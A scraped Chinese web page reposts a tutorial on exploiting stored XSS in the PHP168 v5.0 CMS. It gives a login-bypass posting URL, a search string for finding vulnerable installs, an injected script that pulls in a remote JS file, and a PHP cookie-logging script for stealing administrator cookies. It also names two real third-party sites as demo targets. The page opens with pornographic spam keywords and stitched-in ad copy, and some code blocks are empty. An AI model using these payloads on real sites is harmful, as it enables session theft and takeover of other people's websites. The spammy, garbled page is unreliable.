日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
專業(yè)解讀PHP168 XSS跨站及利用

(一)軟件測(cè)試環(huán)境以及搭建

我們提供的服務(wù)有:成都網(wǎng)站建設(shè)、網(wǎng)站設(shè)計(jì)、微信公眾號(hào)開發(fā)、網(wǎng)站優(yōu)化、網(wǎng)站認(rèn)證、綏陽ssl等。為成百上千家企事業(yè)單位解決了網(wǎng)站和推廣的問題。提供周到的售前咨詢和貼心的售后服務(wù),是有科學(xué)管理、有技術(shù)的綏陽網(wǎng)站制作公司

測(cè)試環(huán)境:本地 XAMPP 1.7.1

測(cè)試軟件:PHP168整站v5.0

軟件下載地址 http://down2.php168.com/v2008.rar

PHP.ini 配置: magic_quotes_gpc Off(On或者Off對(duì)持久型XSS并無沒影響) ;register_globals Off ;safe_mode Off ;

(二)XSS跨站基礎(chǔ)

1、XSS攻擊定義

XSS又叫CSS (Cross Site Script) ,簡(jiǎn)稱跨站腳本攻擊。它指的是惡意攻擊者往Web頁面里插入惡意html代碼,當(dāng)用戶瀏覽該頁之時(shí),嵌入其中Web里面的html代碼會(huì)被執(zhí)行,從而達(dá)到惡意用戶的特殊目的。XSS屬于被動(dòng)式的攻擊,因?yàn)槠浔粍?dòng)且不好利用,所以許多人常呼略其危害性,實(shí)際很多系統(tǒng)都存在XSS漏洞,本文中主要是研究PHP168整站系統(tǒng)中的XSS的利用。

2、如何尋找XSS漏洞

就一般而言,XSS攻擊可以分成兩類,一類是來自內(nèi)部的攻擊,主要指的是利用程序自身的漏洞,構(gòu)造跨站語句,如:dvbbs的showerror.asp存在的跨站漏洞。另一類則是來來自外部的攻擊,主要指的自己構(gòu)造XSS跨站漏洞網(wǎng)頁或者尋找非目標(biāo)機(jī)以外的有跨站漏洞的網(wǎng)頁。如當(dāng)我們要滲透一個(gè)站點(diǎn),我們自己構(gòu)造一個(gè)有跨站漏洞的網(wǎng)頁,然后構(gòu)造跨站語句,通過結(jié)合其它技術(shù),如社會(huì)工程學(xué)等,欺騙目標(biāo)服務(wù)器的管理員打開。

3、如何利用

傳統(tǒng)的跨站利用方式一般都是攻擊者先構(gòu)造一個(gè)跨站網(wǎng)頁,然后在另一空間里放一個(gè)收集cookie的頁面,接著結(jié)合其它技術(shù)讓用戶打開跨站頁面以盜取用戶的cookie,以便進(jìn)一步的攻擊。個(gè)人認(rèn)為這種方式太過于落后,對(duì)于弊端大家可能都知道,因?yàn)榧幢隳闶占搅薱ookie你也未必能進(jìn)一步滲透進(jìn)去,多數(shù)的cookie里面的密碼都是經(jīng)過加密的,如果想要cookie欺騙的話,同樣也要受到其它的條件的限約。而本文提出的另一種思路,則從一定程度上解決上述的問題。對(duì)于個(gè)人而言,比較成熟的方法是通過跨站構(gòu)造一個(gè)表單,表單的內(nèi)容則為利用程序的備份功能或者加管理員等功能得到一個(gè)高權(quán)限。

(三)XSS跨站利用

1.獲取XSS漏洞地址

XSS又叫CSS 全稱Cross Site Scripting 跨站腳本攻擊。分為持久性,反射型兩種。本文演示的是持久性跨站以及簡(jiǎn)單利用。其實(shí)都是站在前人的基礎(chǔ)上,感謝那些無私奉獻(xiàn)的牛牛。我們安裝完php168后,不要登陸,直接打開如下URL: http://localhost/php168/member/post.php?job=postnew&fid=2

可以繞過管理員登陸,直接發(fā)表文章,如圖1所示。

圖1繞過驗(yàn)證直接發(fā)帖

說明:

如果是在實(shí)際網(wǎng)絡(luò)上面進(jìn)行測(cè)試,可以使用“php168/member/post.php”作為關(guān)鍵值進(jìn)行搜索,找到搜索結(jié)果后,對(duì)結(jié)果進(jìn)行查看,如圖2所示,單擊其中的“發(fā)表”鏈接進(jìn)入發(fā)表頁面。這樣獲取的Fid才是正確的ID,否則得到的ID打不開頁面,如圖3所示。在圖3中的相應(yīng)輸入框中輸入相應(yīng)的測(cè)試值,完畢進(jìn)行發(fā)表,如圖4所示,會(huì)給出發(fā)表后的相應(yīng)操作,單擊查看,可以看到剛才發(fā)表的帖子,如圖5所示,整個(gè)發(fā)表過程無須審核和登錄。

圖2 搜索獲取php168發(fā)帖地址

圖3 直接發(fā)表帖子

圖4 發(fā)表帖子成功

圖5 查看發(fā)表的帖子

2.測(cè)試XSS

在發(fā)表帖子頁面中選擇“源碼”模式,然后在內(nèi)容中加入以下代碼:

然后單擊發(fā)表,我們看看文章地址:http://127.0.0.1/php168/bencandy.php?fid=2&aid=4

邪惡的XSS 出現(xiàn),如圖6所示。

圖6找到邪惡的XSS

3.遠(yuǎn)程包含JS文件攻擊

我們遠(yuǎn)程包含JS文件來攻擊,代碼如下:

src="javascript:s=document.createElement('script');

s.src='http://127.0.0.1/xss/xss.js';

document.body.appendChild(s);"/>

這樣直接發(fā)上去是會(huì)被過濾掉的,我們轉(zhuǎn)換編碼,對(duì)于不會(huì)轉(zhuǎn)換編碼的朋友可以到http://ha.ckers.org/xss.html#ipobfuscate去直接轉(zhuǎn)換。

代碼如下:

src="javascript:s=document.createElement('script');

s.src='http://127.0.0.1/xss/xss.js';

document.body.appendChild(s);"/>

這樣我們就可以直接編輯我們的xss.js文件來吊管理員Cookie了。當(dāng)然反射型的更多。其執(zhí)行效果如圖7所示。

圖7 XSS讀取效果

4.獲取Cookie

我們編輯js文件如下:

alert(document.cookie);

返回查看,如圖8所示,顯示本地的Cookie值。

圖8 獲取本地Cookie值

當(dāng)然我們隱藏釣管理員Cookie,并沒測(cè)試官方。請(qǐng)大牛試試吧。

5.編寫代碼獲取Cookie或者直接添加管理員

編寫我們的PHP文件,代碼如下:

/*auther:menzhi007 Blog:http://hi.baidu.com/menzhi007 */

$txtfile = "menzhi.php";

$date = date("Y-m-d - H:i:s");

$cookie = $_GET['get'];

$writeinfo = "{$date}\n{$cookie}\n";

$printer = fopen($txtfile, 'a');

fwrite($printer,$writeinfo);

fclose($printer);

?>或者直接添加管理員,代碼如下:

location.;

平時(shí)也沒什么時(shí)間上網(wǎng),具體大家自己測(cè)試吧。官方路徑:D:\p8-server\wwwroot\php168_com\

已通知官方修補(bǔ)漏洞了,不要搞破壞(沒進(jìn)入官方挺后悔的)。

(四)實(shí)例演示

大家打開官方主頁http://www.php168.com/biz/impower.php

商業(yè)授權(quán)查詢,如圖9所示。

圖9 獲取使用php168整站系統(tǒng)的用戶

我們隨便挑幾個(gè),演示站點(diǎn):

http://www.3cq.org/member/post.php?job=postnew&fid=2

圖10演示站點(diǎn)1

演示站點(diǎn)2:

http://www.ccdv.cc/member/post.php?job=postnew&fid=2

圖11演示站點(diǎn)2

【編輯推薦】

  1. 專題:腳本攻擊和防范
  2. 也談跨站腳本攻擊與防御

名稱欄目:專業(yè)解讀PHP168 XSS跨站及利用
URL標(biāo)題:http://m.5511xx.com/article/coddeie.html